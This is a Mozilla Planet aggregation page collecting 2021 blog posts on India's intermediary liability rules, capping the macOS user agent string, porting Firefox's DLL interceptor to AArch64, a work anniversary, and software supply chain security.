mozilla

Mozilla Nederland LogoDe Nederlandse
Mozilla-gemeenschap

Mozilla Privacy Blog: India’s new intermediary liability and digital media regulations will harm the open internet

Mozilla planet - di, 02/03/2021 - 13:15

Last week, in a sudden move that will have disastrous consequences for the open internet, the Indian government notified a new regime for intermediary liability and digital media regulation. Intermediary liability (or “safe harbor”) protections have been fundamental to growth and innovation on the internet as an open and secure medium of communication and commerce. By expanding the “due diligence” obligations that intermediaries will have to follow to avail safe harbor, these rules will harm end to end encryption, substantially increase surveillance, promote automated filtering and prompt a fragmentation of the internet that would harm users while failing to empower Indians. While many of the most onerous provisions only apply to “significant social media intermediaries” (a new classification scheme), the ripple effects of these provisions will have a devastating impact on freedom of expression, privacy and security.

As we explain below, the current rules are not fit-for-purpose and will have a series of unintended consequences on the health of the internet as a whole:

  • Traceability of Encrypted Content: Under the new rules, law enforcement agencies can demand that companies trace the ‘first originator’ of any message. Many popular services today deploy end-to-end encryption and do not store source information so as to enhance the security of their systems and the privacy they guarantee users. When the first originator is from outside India, the significant intermediary must identify the first originator within the country, making an already impossible task more difficult. This would essentially be a mandate requiring encrypted services to either store additional sensitive information or/and break end-to-end encryption which would weaken overall security, harm privacy and contradict the principles of data minimization endorsed in the Ministry of Electronic and Information Technology’s (MeitY) draft of the data protection bill.
  • Harsh Content Take Down and Data Sharing Timelines: Short timelines of 36 hours for content take downs and 72 hours for the sharing of user data for all intermediaries pose significant implementation and freedom of expression challenges. Intermediaries, especially small and medium service providers, would not have sufficient time to analyze the requests or seek any further clarifications or other remedies under the current rules. This would likely create a perverse incentive to take down content and share user data without sufficient due process safeguards, with the fundamental right to privacy and freedom of expression (as we’ve said before) suffering as a result.
  • User Directed Take Downs of Non-Consensual Sexually Explicit Content and Morphed/Impersonated Content: All intermediaries have to remove or disable access to information within 24 hours of being notified by users or their representatives (not necessarily government agencies or courts) when it comes to non-consensual sexually explicit content (revenge pornography, etc.) and impersonation in an electronic form (deep fakes, etc.). While it attempts to solve for a legitimate and concerning issue, this solution is overbroad and goes against the landmark Shreya Singhal judgment, by the Indian Supreme Court, which had clarified in 2015 that companies would only be expected to remove content when directed by a court order or a government agency to do so.
  • Social Media User Verification: In a move that could be dangerous for the privacy and anonymity of internet users, the law contains a provision requiring significant intermediaries to provide the option for users to voluntarily verify their identities. This would likely entail users sharing phone numbers or sending photos of government issued IDs to the companies. This provision will incentivize the collection of sensitive personal data that are submitted for this verification, which can then be also used to profile and target users (the law does seem to require explicit consent to do so). This is not hypothetical conjecture – we have already seen phone numbers collected for security purposes being used for profiling. This provision will also increase the risk from data breaches and entrench power in the hands of large players in the social media and messaging space who can afford to build and maintain such verification systems. There is no evidence to prove that this measure will help fight misinformation (its motivating factor), and it ignores the benefits that anonymity can bring to the internet, such as whistle blowing and protection from stalkers.
  • Automated Filtering: While improved from its earlier iteration in the 2018 draft, the provisions to “endeavor” to carry out automated filtering for child sexual abuse materials (CSAM), non-consensual sexual acts and previously removed content apply to all significant social media intermediaries (including end to end encrypted messaging applications). These are likely fundamentally incompatible with end to end encryption and will weaken protections that millions of users have come to rely on in their daily lives by requiring companies to embed monitoring infrastructure in order to continuously surveil the activities of users with disastrous implications for freedom of expression and privacy.
  • Digital Media Regulation: In a surprising expansion of scope, the new rules also contain government registration and content take down provisions for online news websites, online news aggregators and curated audio-visual platforms. After some self regulatory stages, it essentially gives government agencies the ability to order the take down of news and current affairs content online by publishers (which are not intermediaries), with very few meaningful checks and balances against over reach.

The final rules do contain some improvements from the 2011 original law and the 2018 draft such as limiting the scope of some provisions to significant social media intermediaries, user and public transparency requirements, due process checks and balances around traceability requests, limiting the automated filtering provision and an explicit recognition of the “good samaritan” principle for voluntary enforcement of platform guidelines. In their overall scope, however, they are a dangerous precedent for internet regulation and need urgent reform.

Ultimately, illegal and harmful content on the web, the lack of sufficient accountability  and substandard responses to it undermine the overall health of the internet and as such, are a core concern for Mozilla. We have been at the forefront of these conversations globally (such as the UK, EU and even the 2018 version of this draft in India), pushing for approaches that manage the harms of illegal content online within a rights-protective framework. The regulation of speech online necessarily calls into play numerous fundamental rights and freedoms guaranteed by the Indian constitution (freedom of speech, right to privacy, due process, etc), as well as crucial technical considerations (‘does the architecture of the internet render this type of measure possible or not’, etc). This is a delicate and critical balance, and not one that should be approached with blunt policy proposals.

These rules are already binding law, with the provisions for significant social media intermediaries coming into force 3 months from now (approximately late May 2021). Given the many new provisions in these rules, we recommend that they should be withdrawn and be accompanied by wide ranging and participatory consultations with all relevant stakeholders prior to notification.

The post India’s new intermediary liability and digital media regulations will harm the open internet appeared first on Open Policy & Advocacy.

Categorieën: Mozilla-nl planet

Karl Dubost: Capping User Agent String - followup meeting

Mozilla planet - di, 02/03/2021 - 03:27

Web compatibility is about dealing with a constantly evolving biotope where things die slowly. And even when they disappear, they have contributed to the balance of the ecosystem and modified it in a way they keep their existence.

Ginko Dead leaves

A couple of weeks ago, I mentionned the steps which have been taken about capping the User Agent String on macOS 11 for Web compatibility issues. Since then, Mozilla and Google organized a meeting to discuss the status and the issues related to this effort. We invited Apple but probably too late to find someone who could participate to the meeting (my bad). The minutes of the meeting are publicly accessible.

Meeting Summary
  • Apple and Mozilla have both shipped already the macOS 11 UA capping
  • There is an intent to ship for Google and Ken Russel is double checking that they can move forward with the release that would align chrome with Firefox and Safari.
  • Mozilla has not seen any obvious breakage since the change on the UA string. This is only deployed in nightly right now. Tantek: "My general philosophy is that the UA string has been abused for so long, freezing any part of it is a win."
  • Mozilla and Google agreed to find a venue for a more general public plans for UA reduction/freezing
Some additional news since the meeting
  • In the intent to ship for Google, some big queries on HTTP Archive are being runned to check how wide is the issue. An interesting comment from Yoav saying that "79.4% of Unity sites out there are broken in Chrome".
  • We are very close to have a place for working with other browser vendors on UA reduction and freezing. More news soon (hopefully).

To comment…

Archived copy of the minutes

This is to preserve a copy of the minutes in case they are being defaced or changed.

Capping UA string ==== (Minutes will be public) Present: Mike Taylor (Google), Karl Dubost (Mozilla), Chris Peterson (Mozilla), Aaron Tagliaboschi (Mozilla), Kenneth Russell (Google), Avi Drissman (Google), Tantek Çelik (Mozilla) ### Background * Karl’s summary/history of the issue so far on https://www.otsukare.info/2021/02/15/capping-macos-user-agent * What Apple/Safari currently does Safari caps the UA string to 10.15.7. * What is Mozilla status so far Capped UA’s macOS version at 10.15 in Firefox 87 and soon ESR 78: https://bugzilla.mozilla.org/show_bug.cgi?id=1679929 Capped Windows version to 10 (so we can control when and how we bump Firefox's Windows OS version if Microsoft ever bumps Windows's version): https://bugzilla.mozilla.org/show_bug.cgi?id=1693295 ### What is Google status so far Ken: We have 3 LGTMs on blink-dev, but some folks had concerns. We know there's broad breakage because of this issue. It's not just Unity, and it's spread across a lot of other sites. I think we should land this. Apple has already made this change. Our CL is ready to land. Avi: I have no specific concerns. It aligns with our future goals. It is unfortunate it brings us ahead of our understood schedule. Mike: Moz is on board. Google seems to be on board. Kenneth: If there are any objections from the Chromium side, there has been plenty of time to react. Mike: Have there any breakage reports for Mozilla after landing? Karl: Not yet. I've seen a lot of reports related to Cloudinary, etc, which are a larger concern for Apple. For Firefox, there was no breakage with regards to the thing that was released last week. It's not yet in release. There's still plenty of time to back it out if needed. Chris: Was there an issue for Duo Mobile? Karl: We didn't have any reports like this. But we saw a mention online... from what I understood. Apple had modified the UA string to be 10.15. Then the OS evolved to 10.16. Duo had an issue with the disparity between 10.15.7 in the OS and 10.15.6 in the browser. Since then, they modifed and there's no other issue. Karl: On the Firefox side, if we have breakage, we still have possibility to do site-specific UA interventions. Ken: did you (tantek) have concerns about this change? The review sat there for a while. Tantek: I didn't have any problems with the freezing MacOS version per the comments in our bugzilla on that. My general philosophy is that the UA string has been abused for so long, freezing any part of it is a win. I don't even think we need a 1:1 replacement for everything that's in there today. Chris: The long review time was unrelated to reservations, we were sorting out ownership of the module. ### macOS 11.0 compat issues: Unity’s UA parsing issue Cloudinary’s Safari WebP issue Firefox and Chrome send “Accept: image/webp” header. ### Recurring sync on UA Reduction efforts Which public arena should we have this discussion? Mike: we do have public plans for UA reduction/freezing. These might evolve. It would be cool to be able to meet in the future with other vendors and discuss about the options. Chris & Karl: Usual standards forums would be good. People have opinions on venues.

Otsukare!

Categorieën: Mozilla-nl planet

Karl Dubost: Capping macOS User Agent String on macOS 11

Mozilla planet - di, 02/03/2021 - 03:27

Update on 2021-03-02: Capping User Agent String - followup meeting

This is to keep track and document the sequence of events related to macOS 11 and another cascade of breakages related to the change of user agent strings. There is no good solution. One more time it shows how sniffing User Agent strings are both dangerous (future fail) and source of issues.

Brace for impact!

Lion foot statue

Capping macOS 11 version in User Agent History
  • 2020-06-25 OPENED WebKit 213622 - Safari 14 - User Agent string shows incorrect OS version

    A reporter claims it breaks many websites but without giving details about which websites. There's a mention about VP9

    browser supports vp9

    I left a comment there to get more details.

  • 2020-09-15 OPENED WebKit 216593 - [macOS] Limit reported macOS release to 10.15 series.

    if (!osVersion.startsWith("10")) osVersion = "10_15_6"_s;

    With some comments in the review:

    preserve original OS version on older macOS at Charles's request

    I suspect this is the Charles, the proxy app.

    2020-09-16 FIXED

  • 2020-10-05 OPENED WebKit 217364 - [macOS] Bump reported current shipping release UA to 10_15_7

    On macOS Catalina 10.15.7, Safari reports platform user agent with OS version 10_15_7. On macOS Big Sur 11.0, Safari reports platform user agent with OS version 10_15_6. It's a bit odd to have Big Sur report an older OS version than Catalina. Bump the reported current shipping release UA from 10_15_6 to 10_15_7.

    The issue here is that macOS 11 (Big Sur) reports an older version number than macOS 10.15 (Catalina), because the previous bug harcoded the string number.

    if (!osVersion.startsWith("10")) osVersion = "10_15_7"_s;

    This is still harcoded because in this comment:

    Catalina quality updates are done, so 10.15.7 is the last patch version. Security SUs from this point on won’t increment the patch version, and does not affect the user agent.

    2020-10-06 FIXED

  • 2020-10-11 Unity [WebGL][macOS] Builds do not run when using Big Sur

    UnityLoader.js is the culprit.

    They fixed it on January 2021(?). But there are a lot of legacy codes running out there which could not be updated.

    Irony, there’s no easy way to detect the unity library to create a site intervention that would apply to all games with the issue. Capping the UA string will fix that.

  • 2020-11-30 OPENED Webkit 219346 - User-agent on macOS 11.0.1 reports as 10_15_6 which is older than latest Catalina release.

    It was closed as a duplicate of 217364, but there's an interesting description:

    Regression from 216593. That rev hard codes the User-Agent header to report MacOS X 10_15_6 on macOS 11.0+ which breaks Duo Security UA sniffing OS version check. Duo security check fails because latest version of macOS Catalina is 10.15.7 but 10.15.6 is being reported.

  • 2020-11-30 OPENED Gecko 1679929 - Cap the User-Agent string's reported macOS version at 10.15

    There is a patch for Gecko to cap the user agent string the same way that Apple does for Safari. This will solve the issue with Unity Games which have been unable to adjust the code source to the new version of Unity.

    // Cap the reported macOS version at 10.15 (like Safari) to avoid breaking // sites that assume the UA's macOS version always begins with "10.". int uaVersion = (majorVersion >= 11 || minorVersion > 15) ? 15 : minorVersion; // Always return an "Intel" UA string, even on ARM64 macOS like Safari does. mOscpu = nsPrintfCString("Intel Mac OS X 10.%d", uaVersion);

    It should land very soon, this week (week 8, February 2021), on Firefox Nightly 87. We can then monitor if anything is breaking with this change.

  • 2020-12-04 OPENED Gecko 1680516 - [Apple Chip - ARM64 M1] Game is not loaded on Gamearter.com

    Older versions of Unity JS used to run games are broken when the macOS version is 10_11_0 in the user agent string of the browser.

    The Mozilla webcompat team proposed to fix this with a Site Intervention for gamearter specifically. This doesn't solve the other games breaking.

  • 2020-12-14 OPENED Gecko 1682238 - Override navigator.userAgent for gamearter.com on macOS 11.0

    A quick way to fix the issue on Firefox for gamearter was to release a site intervention by the Mozilla webcompat team

    "use strict"; /* * Bug 1682238 - Override navigator.userAgent for gamearter.com on macOS 11.0 * Bug 1680516 - Game is not loaded on gamearter.com * * Unity < 2021.1.0a2 is unable to correctly parse User Agents with * "Mac OS X 11.0" in them, so let's override to "Mac OS X 10.16" instead * for now. */ /* globals exportFunction */ if (navigator.userAgent.includes("Mac OS X 11.")) { console.info( "The user agent has been overridden for compatibility reasons. See https://bugzilla.mozilla.org/show_bug.cgi?id=1680516 for details." ); let originalUA = navigator.userAgent; Object.defineProperty(window.navigator.wrappedJSObject, "userAgent", { get: exportFunction(function() { return originalUA.replace(/Mac OS X 11\.(\d)+;/, "Mac OS X 10.16;"); }, window), set: exportFunction(function() {}, window), }); }
  • 2020-12-16 OPENED WebKit 219977 - WebP loading error in Safari on iOS 14.3

    In this comment, Cloudinary explains they try to avoid the issue with the system bug with UA detection.

    Cloudinary is attempting to work around this issue by turning off WebP support to affected clients.

    If this is indeed about the underlying OS frameworks, rather than the browser version, as far as we can tell it appeared sometime after MacOS 11.0.1 and before or in 11.1.0. All we have been able to narrow down on the iOS side is ≥14.0.

    If you have additional guidance on which versions of the OSes are affected, so that we can prevent Safari users from receiving broken images, it would be much appreciated!

    Eric Portis (Cloudinary) created some tests: * WebPs that break in iOS ≥ 14.3 & MacOS ≥ 11.1 * Tiny WebP

    The issue seems to affect CloudFlare

  • 2021-01-05 OPENED WebKit WebP failures [ Big Sur ] fast/images/webp-as-image.html is failing

  • 2021-01-29 OPENED Blink 1171998 - Nearly all Unity WebGL games fail to run in Chrome on macOS 11 because of userAgent

  • 2021-02-06 OPENED Blink 1175225 - Cap the reported macOS version in the user-agent string at 10_15_7

    Colleagues at Mozilla, on the Firefox team, and Apple, on the Safari team, report that there are a long tail of websites broken from reporting the current macOS Big Sur version, e.g. 11_0_0, in the user agent string:

    Mac OS X 11_0_0

    and for this reason, as well as slightly improving user privacy, have decided to cap the reported OS version in the user agent string at 10.15.7:

    Mac OS X 10_15_7

  • 2021-02-09 Blink Intent to Ship: User Agent string: cap macOS version number to 10_15_7

    Ken Russell sends an intent to cap macOS in the Chrome (blink) user agent string to 10_15_7 to follow on the steps of Apple and Mozilla. In the intent to ship, there is a discussion on solving the issue with Client Hints. Sec-CH-UA-Platform-Version would be a possibility, but Client Hints is not yet deployed across browsers and there is not yet a full consensus about it. This is a specification pushed by Google and partially implemented by Google on Chrome.

    Masataka Yakura shared with me (Thanks!) two threads on the Webkit-dev mailing-list. One from May 2020 and another one from November 2020.

    In May, Maciej said:

    I think there’s a number of things in the spec that should be cleaned up before an implementation ships enabled by default, specifically around interop, privacy, and protection against UA lockouts. I know there are PRs in flight for some of these issues. I think it would be good to get more of the open issues to resolution before actually shipping this.

    And in November, Maciej did another round of spec review with one decisive issue.

    Note that Google has released, last year, on January 14, 2020 an Intent to Ship: Client Hints infrastructure and UA Client Hints and this was enabled a couple of days ago on February 11, 2021.

And I'm pretty sure the story is not over. There will be probably more breakages and more unknown bugs.

Otsukare!

Categorieën: Mozilla-nl planet

Aaron Klotz: 2019 Roundup: Part 1 - Porting the DLL Interceptor to AArch64

Mozilla planet - ma, 01/03/2021 - 20:50

In my continuing efforts to get caught up on discussing my work, I am now commencing a roundup for 2019. I think I am going to structure this one slightly differently from the last one: I am going to try to segment this roundup by project.

Here is an index of all the entries in this series:

Porting the DLL Interceptor to AArch64

During early 2019, Mozilla was working to port Firefox to run on the new AArch64 builds of Windows. At our December 2018 all-hands, I brought up the necessity of including the DLL Interceptor in our porting efforts. Since no deed goes unpunished, I was put in charge of doing the work! [I’m actually kidding here; this project was right up my alley and I was happy to do it! – Aaron]

Before continuing, you might want to review my previous entry describing the Great Interceptor Refactoring of 2018, as this post revisits some of the concepts introduced there.

Let us review some DLL Interceptor terminology:

  • The target function is the function we want to hook (Note that this is a distinct concept from a branch target, which is also discussed in this post);
  • The hook function is our function that we want the intercepted target function to invoke;
  • The trampoline is a small chunk of executable code generated by the DLL interceptor that facilitates calling the target function’s original implementation.

On more than one occasion I had to field questions about why this work was even necessary for AArch64: there aren’t going to be many injected DLLs in a Win32 ecosystem running on a shiny new processor architecture! In fact, the DLL Interceptor is used for more than just facilitating the blocking of injected DLLs; we also use it for other purposes.

Not all of this work was done in one bug: some tasks were more urgent than others. I began this project by enumerating our extant uses of the interceptor to determine which instances were relevant to the new AArch64 port. I threw a record of each instance into a colour-coded spreadsheet, which proved to be very useful for tracking progress: Reds were “must fix” instances, yellows were “nice to have” instances, and greens were “fixed” instances. Coordinating with the milestones laid out by program management, I was able to assign each instance to a bucket which would help determine a total ordering for the various fixes. I landed the first set of changes in bug 1526383, and the second set in bug 1532470.

It was now time to sit down, download some AArch64 programming manuals, and take a look at what I was dealing with. While I have been messing around with x86 assembly since I was a teenager, my first exposure to RISC architectures was via the DLX architecture introduced by Hennessy and Patterson in their textbooks. While DLX was crafted specifically for educational purposes, it served for me as a great point of reference. When I was a student taking CS 241 at the University of Waterloo, we had to write a toy compiler that generated DLX code. That experience ended up saving me a lot of time when looking into AArch64! While the latter is definitely more sophisticated, I could clearly recognize analogs between the two architectures.

In some ways, targeting a RISC architecture greatly simplifies things: The DLL Interceptor only needs to concern itself with a small subset of the AArch64 instruction set: loads and branches. In fact, the DLL Interceptor’s AArch64 disassembler only looks for nine distinct instructions! As a bonus, since the instruction length is fixed, we can easily copy over verbatim any instructions that are not loads or branches!

On the other hand, one thing that increased complexity of the port is that some branch instructions to relative addresses have maximum offsets. If we must branch farther than that maximum, we must take alternate measures. For example, in AArch64, an unconditional branch with an immediate offset must land in the range of ±128 MiB from the current program counter.

Why is this a problem, you ask? Well, Detours-style interception must overwrite the first several instructions of the target function. To write an absolute jump, we require at least 16 bytes: 4 for an LDR instruction, 4 for a BR instruction, and another 8 for the 64-bit absolute branch target address.

Unfortunately, target functions may be really short! Some of the target functions that we need to patch consist only of a single 4-byte instruction!

In this case, our only option for patching the target is to use an immediate B instruction, but that only works if our hook function falls within that ±128MiB limit. If it does not, we need to construct a veneer. A veneer is a special trampoline whose location falls within the target range of a branch instruction. Its sole purpose is to provide an unconditional jump to the “real” desired branch target that lies outside of the range of the original branch. Using veneers, we can successfully hook a target function even if it is only one instruction (ie, 4 bytes) in length, and the hook function lies more than 128MiB away from it. The AArch64 Procedure Call Standard specifies X16 as a volatile register that is explicitly intended for use by veneers: veneers load an absolute target address into X16 (without needing to worry about whether or not they’re clobbering anything), and then unconditionally jump to it.

Measuring Target Function Instruction Length

To determine how many instructions the target function has for us to work with, we make two passes over the target function’s code. The first pass simply counts how many instructions are available for patching (up to the 4 instruction maximum needed for absolute branches; we don’t really care beyond that).

The second pass actually populates the trampoline, builds the veneer (if necessary), and patches the target function.

Veneer Support

Since the DLL interceptor is already well-equipped to build trampolines, it did not take much effort to add support for constructing veneers. However, where to write out a veneer is just as important as what to write to a veneer.

Recall that we need our veneer to reside within ±128 MiB of an immediate branch. Therefore, we need to be able to exercise some control over where the trampoline memory for veneers is allocated. Until this point, our trampoline allocator had no need to care about this; I had to add this capability.

Adding Range-Aware VM Allocation

Firstly, I needed to make the MMPolicy classes range-aware: we need to be able to allocate trampoline space within acceptable distances from branch instructions.

Consider that, as described above, a branch instruction may have limits on the extents of its target. As data, this is easily formatted as a pivot (ie, the PC at the location where the branch instruction is encoutered), and a maximum distance in either direction from that pivot.

On the other hand, range-constrained memory allocation tends to work in terms of lower and upper bounds. I wrote a conversion method, MMPolicyBase::SpanFromPivotAndDistance, to convert between the two formats. In addition to format conversion, this method also constrains resulting bounds such that they are above the 1MiB mark of the process’ address space (to avoid reserving memory in VM regions that are sensitive to compatiblity concerns), as well as below the maximum allowable user-mode VM address.

Another issue with range-aware VM allocation is determining the location, within the allowable range, for the actual VM reservation. Ideally we would like the kernel’s memory manager to choose the best location for us: its holistic view of existing VM layout (not to mention ASLR) across all processes will provide superior VM reservations. On the other hand, the Win32 APIs that facilitate this are specific to Windows 10. When available, MMPolicyInProcess uses VirtualAlloc2 and MMPolicyOutOfProcess uses MapViewOfFile3. When we’re running on Windows versions where those APIs are not yet available, we need to fall back to finding and reserving our own range. The MMPolicyBase::FindRegion method handles this for us.

All of this logic is wrapped up in the MMPolicyBase::Reserve method. In addition to the desired VM size and range, the method also accepts two functors that wrap the OS APIs for reserving VM. Reserve uses those functors when available, otherwise it falls back to FindRegion to manually locate a suitable reservation.

Now that our memory management primatives were range-aware, I needed to shift my focus over to our VM sharing policies.

One impetus for the Great Interceptor Refactoring was to enable separate Interceptor instances to share a unified pool of VM for trampoline memory. To make this range-aware, I needed to make some additional changes to VMSharingPolicyShared. It would no longer be sufficient to assume that we could just share a single block of trampoline VM — we now needed to make the shared VM policy capable of potentially allocating multiple blocks of VM.

VMSharingPolicyShared now contains a mapping of ranges to VM blocks. If we request a reservation which an existing block satisfies, we re-use that block. On the other hand, if we require a range that is yet unsatisfied, then we need to allocate a new one. I admit that I kind of half-assed the implementation of the data structure we use for the mapping; I was too lazy to implement a fully-fledged interval tree. The current implementation is probably “good enough,” however it’s probably worth fixing at some point.

Finally, I added a new generic class, TrampolinePool, that acts as an abstraction of a reserved block of VM address space. The main interceptor code requests a pool by calling the VM sharing policy’s Reserve method, then it uses the pool to retrieve new Trampoline instances to be populated.

AArch64 Trampolines

It is much simpler to generate trampolines for AArch64 than it is for x86(-64). The most noteworthy addition to the Trampoline class is the WriteLoadLiteral method, which writes an absolute address into the trampoline’s literal pool, followed by writing an LDR instruction referencing that literal into the trampoline.

Thanks for reading! Coming up next time: My Untrusted Modules Opus.

Categorieën: Mozilla-nl planet

Jan-Erik Rediger: Three-year Moziversary

Mozilla planet - ma, 01/03/2021 - 11:00

Has it really been 3 years? I guess it has. I joined Mozilla as a Firefox Telemetry Engineer in March 2018, I blogged twice already: 2019, 2020.

And now it's 2021. 2020 was nothing like I thought it would and still been a lot like I said last year at this point. It's been Glean all over the year, but instead of working from the office and occasionally meeting my team in person, it's been working from home for 12 months now.

In September of last year I officially became the Glean SDK tech lead and thus I'm now responsible for the technical direction and organisation of the whole project, but really this is a team effort. Throughout the year we made Project FOG happen. At least the code is there and we can start migrating now. It's far from finished of course.

I blogged about Glean in 2021 and we're already seeing the first pieces of that plan being implemented. After some reorganization the team I'm in grew again so now we have Daniel, Anthony and Frank there as well (we're still Team "Browser Measurement III"). This brings two parts of the Glean project closer together (not that it was far apart).

There's more work ahead, interesting challenges to tackle and projects to support in migrating to Glean. To the next year and beyond!

Thank you

Thanks to my team: Bea, Chris, Travis, Alessio, Mike, Daniel, Anthony and Frank and also thanks to the bigger data engineering team within Mozilla. And thanks to all the other people at Mozilla I work with.

Categorieën: Mozilla-nl planet

The Mozilla Blog: Notes on Addressing Supply Chain Vulnerabilities

Mozilla planet - za, 27/02/2021 - 23:41

Addressing Supply Chain Vulnerabilities

One of the unsung achievements of modern software development is the degree to which it has become componentized: not that long ago, when you wanted to write a piece of software you had to write pretty much the whole thing using whatever tools were provided by the language you were writing in, maybe with a few specialized libraries like OpenSSL. No longer. The combination of newer languages, Open Source development and easy-to-use package management systems like JavaScript’s npm or Rust’s Cargo/crates.io has revolutionized how people write software, making it standard practice to pull in third party libraries even for the simplest tasks; it’s not at all uncommon for programs to depend on hundreds or thousands of third party packages.

Supply Chain Attacks

While this new paradigm has revolutionized software development, it has also greatly increased the risk of supply chain attacks, in which an attacker compromises one of your dependencies and through that your software.[1] A famous example of this is provided by the 2018 compromise of the event-stream package to steal Bitcoin from people’s computers. The Register’s brief history provides a sense of the scale of the problem:

Ayrton Sparling, a computer science student at California State University, Fullerton (FallingSnow on GitHub), flagged the problem last week in a GitHub issues post. According to Sparling, a commit to the event-stream module added flatmap-stream as a dependency, which then included injection code targeting another package, ps-tree.

There are a number of ways in which an attacker might manage to inject malware into a package. In this case, what seems to have happened is that the original maintainer of event-stream was no longer working on it and someone else volunteered to take it over. Normally, that would be great, but here it seems that volunteer was malicious, so it’s not great.

Standards for Critical Packages

Recently, Eric Brewer, Rob Pike, Abhishek Arya, Anne Bertucio and Kim Lewandowski posted a proposal on the Google security blog for addressing vulnerabilities in Open Source software. They cover a number of issues including vulnerability management and security of compilation, and there’s a lot of good stuff here, but the part that has received the most attention is the suggestion that certain packages should be designated “critical”[2]:

For software that is critical to security, we need to agree on development processes that ensure sufficient review, avoid unilateral changes, and transparently lead to well-defined, verifiable official versions.

These are good development practices, and ones we follow here at Mozilla, so I certainly encourage people to adopt them. However, trying to require them for critical software seems like it will have some problems.

It creates friction for the package developer

One of the real benefits of this new model of software development is that it’s low friction: it’s easy to develop a library and make it available — you just write it put it up on a package repository like crates.io — and it’s easy to use those packages — you just add them to your build configuration. But then you’re successful and suddenly your package is widely used and gets deemed “critical” and now you have to put in place all kinds of new practices. It probably would be better if you did this, but what if you don’t? At this point your package is widely used — or it wouldn’t be critical — so what now?

It’s not enough

Even packages which are well maintained and have good development practices routinely have vulnerabilities. For example, Firefox recently released a new version that fixed a vulnerability in the popular ANGLE graphics engine, which is maintained by Google. Both Mozilla and Google follow the practices that this blog post recommends, but it’s just the case that people make mistakes. To (possibly mis)quote Steve Bellovin, “Software has bugs. Security-relevant software has security-relevant bugs”. So, while these practices are important to reduce the risk of vulnerabilities, we know they can’t eliminate them.

Of course this applies to inadvertant vulnerabilities, but what about malicious actors (though note that Brewer et al. observe that “Taking a step back, although supply-chain attacks are a risk, the vast majority of vulnerabilities are mundane and unintentional—honest errors made by well-intentioned developers.”)? It’s possible that some of their proposed changes (in particular forbidding anonymous authors) might have an impact here, but it’s really hard to see how this is actionable. What’s the standard for not being anonymous? That you have an e-mail address? A Web page? A DUNS number?[3] None of these seem particularly difficult for a dedicated attacker to fake and of course the more strict you make the requirements the more it’s a burden for the (vast majority) of legitimate developers.

I do want to acknowledge at this point that Brewer et al. clearly state that multiple layers of protection needed and that it’s necessary to have robust mechanisms for handling vulnerability defenses. I agree with all that, I’m just less certain about this particular piece.

Redefining Critical

Part of the difficulty here is that there are ways in which a piece of software can be “critical”:

  • It can do something which is inherently security sensitive (e.g., the OpenSSL SSL/TLS stack which is responsible for securing a huge fraction of Internet traffic).
  • It can be widely used (e.g., the Rust log) crate, but not inherently that sensitive.

The vast majority of packages — widely used or not — fall into the second category: they do something important but that isn’t security critical. Unfortunately, because of the way that software is generally built, this doesn’t matter: even when software is built out of a pile of small components, when they’re packaged up into a single program, each component has all the privileges that that program has. So, for instance, suppose you include a component for doing statistical calculations: if that component is compromised nothing stops it from opening up files on your disk and stealing your passwords or Bitcoins or whatever. This is true whether the compromise is due to an inadvertant vulnerability or malware injected into the package: a problem in any component compromises the whole system.[4] Indeed, minor non-security components make attractive targets because they may not have had as much scrutiny as high profile security components.

Least Privilege in Practice: Better Sandboxing

When looked at from this perspective, it’s clear that we have a technology problem: There’s no good reason for individual components to have this much power. Rather, they should only have the capabilities they need to do the job they are intended to to (the technical term is least privilege); it’s just that the software tools we have don’t do a good job of providing this property. This is a situation which has long been recognized in complicated pieces of software like Web browsers, which employ a technique called “process sandboxing” (pioneered by Chrome) in which the code that interacts with the Web site is run in its own “sandbox” and has limited abilities to interact with your computer. When it wants to do something that it’s not allowed to do, it talks to the main Web browser code and asks it to do it for it, thus allowing that code to enforce the rules without being exposed to vulnerabilities in the rest of the browser.

Process sandboxing is an important and powerful tool, but it’s a heavyweight one; it’s not practical to separate out every subcomponent of a large program into its own process. The good news is that there are several recent technologies which do allow this kind of fine-grained sandboxing, both based on WebAssembly. For WebAssembly programs, nanoprocesses allow individual components to run in their own sandbox with component-specific access control lists. More recently, we have been experimenting with a technology called called RLBox developed by researchers at UCSD, UT Austin, and Stanford which allows regular programs such as Firefox to run sandboxed components. The basic idea behind both of these is the same: use static compilation techniques to ensure that the component is memory-safe (i.e., cannot reach outside of itself to touch other parts of the program) and then give it only the capabilities it needs to do its job.

Techniques like this point the way to a scalable technical approach for protecting yourself from third party components: each component is isolated in its own sandbox and comes with a list of the capabilities that it needs (often called a manifest) with the compiler enforcing that it has no other capabilities (this is not too dissimilar from — but much more granular than — the permissions that mobile applications request). This makes the problem of including a new component much simpler because you can just look at the capabilities it requests, without needing verify that the code itself is behaving correctly.

Making Auditing Easier

While powerful, sandboxing itself — whether of the traditional process or WebAssembly variety — isn’t enough, for two reasons. First, the APIs that we have to work with aren’t sufficiently fine-grained. Consider the case of a component which is designed to let you open and process files on the disk; this necessarily needs to be able to open files, but what stops it from reading your Bitcoins instead of the files that the programmer wanted it to read? It might be possible to create a capability list that includes just reading certain files, but that’s not the API the operating system gives you, so now we need to invent something. There are a lot of cases like this, so things get complicated.

The second reason is that some components are critical because they perform critical functions. For instance, no matter how much you sandbox OpenSSL, you still have to worry about the fact that it’s handling your sensitive data, and so if compromised it might leak that. Fortunately, this class of critical components is smaller, but it’s non-zero.

This isn’t to say that sandboxing isn’t useful, merely that it’s insufficient. What we need is multiple layers of protection[5], with the first layer being procedural mechanisms to defend against code being compromised and the second layer being fine-grained sandboxing to contain the impact of compromise. As noted earlier, it seems problematic to put the burden of better processes on the developer of the component, especially when there are a large number of dependent projects, many of them very well funded.

Something we have been looking at internally at Mozilla is a way for those projects to tag the dependencies they use and depend on. The way that this would work is that each project would then be tagged with a set of other projects which used it (e.g., “Firefox uses this crate”). Then when you are considering using a component you could look to see who else uses it, which gives you some measure of confidence. Of course, you don’t know what sort of auditing those organizations do, but if you know that Project X is very security conscious and they use component Y, that should give you some level of confidence. This is really just a automating something that already happens informally: people judge components by who else uses them. There are some obvious extensions here, for instance labelling specific versions, having indications of what kind of auditing the depending project did, or allowing people to configure their build systems to automatically trust projects vouched for by some set of other projects and refuse to include unvouched projects, maintaining a database of insecure versions (this is something the Brewer et al. proposal suggests too). The advantage of this kind of approach is that it puts the burden on the people benefitting from a project, rather than having some widely used project suddenly subject to a whole pile of new requirements which they may not be interested in meeting. This work is still in the exploratory stages, so reach out to me if you’re interested.

